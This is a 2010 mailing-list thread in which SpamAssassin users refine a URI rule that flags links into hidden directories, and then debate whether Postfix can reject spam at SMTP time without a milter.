John Hardin wrote:
On Mon, 8 Mar 2010, Ned Slider wrote:
So I've refined the rule to specifically exclude hitting on the sequence
../. which stops the rule triggering on multiple relative paths.
uriLOCAL_URI_HIDDEN_DIR/(?!.{6}\.\.\/\..).{8}\/\../
How about:
uri LOCAL_URI_HIDDEN_DIRm;.{8}/\..(?!/);
Yes, that works too on my examples and is probably a more elegant solution
than mine :-)
John - are you able to try this rule in your sandbox and do mass checks? I'd
be interested to see how it scores.
I'll add it.
--
John Hardin KA7OHZhttp://www.impsec.org/~jhardin/
jhar...@impsec.orgFALaholic #11174 pgpk -a jhar...@impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
---
Failure to plan ahead on someone else's part does not constitute
an emergency on my part. -- David W. Barts in a.s.r
---
6 days until Daylight Saving Time begins in U.S. - Spring Forward
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Mon, 2010-03-08 at 20:44 +, Ned Slider wrote:
Brian wrote:
That's Postfix 2.3.3 on RHEL5 BTW :-)
$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64
Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using a the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)
See this guide I've written:
http://wiki.centos.org/HowTos/postfix_restrictions
Specifically,
# /etc/postfix/main.cf
# Recipient restrictions:
smtpd_recipient_restrictions =
reject_unknown_recipient_domain
Yes, but that does not answer my question {and is once more Postfix
biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
Spamassassin decides IS SPAM without the aid of a milter or policy
deamon of some kind. Unless you know different?
Natively It can happily do it after accepting the mail (hint - a bit
late then...) with an after queue filter, but this is prone to the
phenomenon that is 'Postscatter' -sending the message back to the
(often) forged sender. This is kind of ironic given how the Postfix
Posse bang on about 'not accepting' mail of criteria 'x'.
Postfix, much that I love it, has some gaping holes in it's feature set.
It really is an MTA for the 1990's. The need to bolt in an Sendmail
Milter to get it to reject Spamassassin tagged mail at the SMTP stage is
a glaring example IHMO - But all this is very much OT.
